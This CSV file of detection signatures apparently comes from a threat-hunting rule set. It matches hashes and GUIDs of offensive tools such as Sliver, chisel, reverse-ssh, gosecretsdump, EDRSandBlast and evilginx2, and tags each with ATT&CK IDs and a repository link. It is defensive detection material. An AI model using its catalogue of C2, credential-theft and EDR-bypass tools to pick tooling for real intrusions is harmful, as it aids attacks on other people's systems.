"*37ffc17e18e52704214b980c56fad5a3ee6c9941905a9b76a3c914d82f3d1a61*",".{0,1000}37ffc17e18e52704214b980c56fad5a3ee6c9941905a9b76a3c914d82f3d1a61.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*38074409fb6889d1a58cbda706a1167410e4a640630cf128472902a5967074af*",".{0,1000}38074409fb6889d1a58cbda706a1167410e4a640630cf128472902a5967074af.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*381135de47985bd9d5079830dae251313b9f08458da9e8185b6253d8e477fd9c*",".{0,1000}381135de47985bd9d5079830dae251313b9f08458da9e8185b6253d8e477fd9c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*38189c5fd3ff9946f4498d31e11bb47e49e276e445050f1b9ba9d84b40e55c65*",".{0,1000}38189c5fd3ff9946f4498d31e11bb47e49e276e445050f1b9ba9d84b40e55c65.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*382B6332-4A57-458D-96EB-B312688A7604*",".{0,1000}382B6332\-4A57\-458D\-96EB\-B312688A7604.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*385a18846808ae7f07d1be33dfe8c850736eec33910e1366fdff14bb4384b690*",".{0,1000}385a18846808ae7f07d1be33dfe8c850736eec33910e1366fdff14bb4384b690.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*388cab24c7ad1eab00833aa5200541295ba3e17d39d01636f2a8bbb37c732b00*",".{0,1000}388cab24c7ad1eab00833aa5200541295ba3e17d39d01636f2a8bbb37c732b00.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*389081eec49334d1d6ef3ba46e2167f6f3010443cf39a4f2e431b274fb58c369*",".{0,1000}389081eec49334d1d6ef3ba46e2167f6f3010443cf39a4f2e431b274fb58c369.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*38a838f0558351bea32e58dd7f5bafe47a66c54c14f2be2cbf1631109377257f*",".{0,1000}38a838f0558351bea32e58dd7f5bafe47a66c54c14f2be2cbf1631109377257f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 
- T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*38ea755e162c55ef70f9506dddfd01641fc838926af9c43eda652da63c67058b*",".{0,1000}38ea755e162c55ef70f9506dddfd01641fc838926af9c43eda652da63c67058b.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*38f4134e67348c6eb804f52463d9b3716ffa93ead0db4aa21ff9231bc91fc52a*",".{0,1000}38f4134e67348c6eb804f52463d9b3716ffa93ead0db4aa21ff9231bc91fc52a.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*390b859b5bb058c09998a5eb532d819b4977924c81a2f3ddd4f36c4b9d26f2bf*",".{0,1000}390b859b5bb058c09998a5eb532d819b4977924c81a2f3ddd4f36c4b9d26f2bf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3930e87199b44252705c1114f728e3ca38e6439a7279ef8d7fd33fa9869b9b43*",".{0,1000}3930e87199b44252705c1114f728e3ca38e6439a7279ef8d7fd33fa9869b9b43.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*394cd66a9040e0c75a2faa3f9108029689df136927665573bf4a457f58c9a798*",".{0,1000}394cd66a9040e0c75a2faa3f9108029689df136927665573bf4a457f58c9a798.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3951c1b03367cc1dc4de8290ec9507dad9f239a53b815f09691dea5a78c00901*",".{0,1000}3951c1b03367cc1dc4de8290ec9507dad9f239a53b815f09691dea5a78c00901.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*39537a85f0b719915f068289d3e6da72899861afcdb3ca5d7a78de505629ac8d*",".{0,1000}39537a85f0b719915f068289d3e6da72899861afcdb3ca5d7a78de505629ac8d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a 
honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*395408bc1ac0cbe250b3131c09592f7ac490a77a2625ce2f213480a96fcc8bd4*",".{0,1000}395408bc1ac0cbe250b3131c09592f7ac490a77a2625ce2f213480a96fcc8bd4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*39666b5eecc134e2d6c22ef6233faee7f8556383c82368b98d85ff106931f751*",".{0,1000}39666b5eecc134e2d6c22ef6233faee7f8556383c82368b98d85ff106931f751.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*396febb7796a5a3ba0250af4700e9fa21240a83c4ebc2a744da0c2f028ca396c*",".{0,1000}396febb7796a5a3ba0250af4700e9fa21240a83c4ebc2a744da0c2f028ca396c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" 
"*3998762030e8de14ef07cd7befce737e4ab9d4fa0682621dedb56e7774a941d5*",".{0,1000}3998762030e8de14ef07cd7befce737e4ab9d4fa0682621dedb56e7774a941d5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*39a32bbb1285b51059b5e7780f3e0b49dff4496e904641219215ea13634aa8fd*",".{0,1000}39a32bbb1285b51059b5e7780f3e0b49dff4496e904641219215ea13634aa8fd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*39a9dada9b6dc223cba7c4cb35efceb7cd9e40345c362c15e4c203d16f65de9f*",".{0,1000}39a9dada9b6dc223cba7c4cb35efceb7cd9e40345c362c15e4c203d16f65de9f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*39a9f25d64ef416e4be4fadf6fae1b2169bfeb02501be443e8af1fec17412f60*",".{0,1000}39a9f25d64ef416e4be4fadf6fae1b2169bfeb02501be443e8af1fec17412f60.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*39b7a8fec13a9cee773a09c4f277a490b07fd2dd3009a7ee9092165688d7da32*",".{0,1000}39b7a8fec13a9cee773a09c4f277a490b07fd2dd3009a7ee9092165688d7da32.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*39f0a8aa528f48997f9d2b81845eb9f7fbdf6151f34f883ee30da4649cc151ae*",".{0,1000}39f0a8aa528f48997f9d2b81845eb9f7fbdf6151f34f883ee30da4649cc151ae.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*3a04d62f46cebdb6a568e6a9099106314ca6398f9dedd2e5433e3a890505f62e*",".{0,1000}3a04d62f46cebdb6a568e6a9099106314ca6398f9dedd2e5433e3a890505f62e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3a1081100f285cef3c41c192d3b6d02f3bfcbc2b591be894f12ede8707b436b4*",".{0,1000}3a1081100f285cef3c41c192d3b6d02f3bfcbc2b591be894f12ede8707b436b4.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*3a2b0667b9d4537180ef1bb22133b58ddb0f6dbd9941e603277d293884c9c2c9*",".{0,1000}3a2b0667b9d4537180ef1bb22133b58ddb0f6dbd9941e603277d293884c9c2c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*",".{0,1000}3A2FCB56\-01A3\-41B3\-BDAA\-B25F45784B23.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponizes a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*",".{0,1000}3A2FCB56\-01A3\-41B3\-BDAA\-B25F45784B23.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*3a3bd44b20afbb14ce14e70e474491383c2fcc87a554e4fbdc489c65ee7ace2a*",".{0,1000}3a3bd44b20afbb14ce14e70e474491383c2fcc87a554e4fbdc489c65ee7ace2a.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*3a45bdd0bae1a480040acc8ac74814d9abb904240b4c43e2fc8e730c69114fc9*",".{0,1000}3a45bdd0bae1a480040acc8ac74814d9abb904240b4c43e2fc8e730c69114fc9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3a596620516109f4f6d5bfe1b2d38f53f04b60f3fff457573dd506ee981aaea3*",".{0,1000}3a596620516109f4f6d5bfe1b2d38f53f04b60f3fff457573dd506ee981aaea3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3a8e6fe87d5cea3b118aa6b900c63cf7c9d0e4fe3c3bced830861f2835caea33*",".{0,1000}3a8e6fe87d5cea3b118aa6b900c63cf7c9d0e4fe3c3bced830861f2835caea33.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 
- T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3aa113440e9f684df0d0f889c69ae914a40b07c10a340d1fad4f8365286fe19d*",".{0,1000}3aa113440e9f684df0d0f889c69ae914a40b07c10a340d1fad4f8365286fe19d.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*3aa2845ca86220e20ba6e4f2f08ff1aad9aa4c2cb47c38213bbf21e7fdd87b03*",".{0,1000}3aa2845ca86220e20ba6e4f2f08ff1aad9aa4c2cb47c38213bbf21e7fdd87b03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3ac48e132a8186b8302e04c77c22c4ff2984e6b6bd16bf65361cd1b751559703*",".{0,1000}3ac48e132a8186b8302e04c77c22c4ff2984e6b6bd16bf65361cd1b751559703.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3ac89800bd6dc53207c19d3d35161342cc19bc09a212710393ec9ab79fb55ba1*",".{0,1000}3ac89800bd6dc53207c19d3d35161342cc19bc09a212710393ec9ab79fb55ba1.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*3ADB8BB1-AE14-49DA-A7E1-1C0D9BEB76E9*",".{0,1000}3ADB8BB1\-AE14\-49DA\-A7E1\-1C0D9BEB76E9.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense 
Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*3b2aea9615c1f94c724af17885c4587e9818652ff92e4debd002522e7be96a58*",".{0,1000}3b2aea9615c1f94c724af17885c4587e9818652ff92e4debd002522e7be96a58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3b486b14426ff6bb3e2c4e9d5d92821a50d5ef26f32e9ba244ca73fdfd81ec66*",".{0,1000}3b486b14426ff6bb3e2c4e9d5d92821a50d5ef26f32e9ba244ca73fdfd81ec66.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3b66b9ef669a7aca55f87ccce04ab1849d23d18c522b5f2514ca0637398ca250*",".{0,1000}3b66b9ef669a7aca55f87ccce04ab1849d23d18c522b5f2514ca0637398ca250.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*3B85D7A9-6BD0-4CD8-9009-36554EF24D32*",".{0,1000}3B85D7A9\-6BD0\-4CD8\-9009\-36554EF24D32.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" 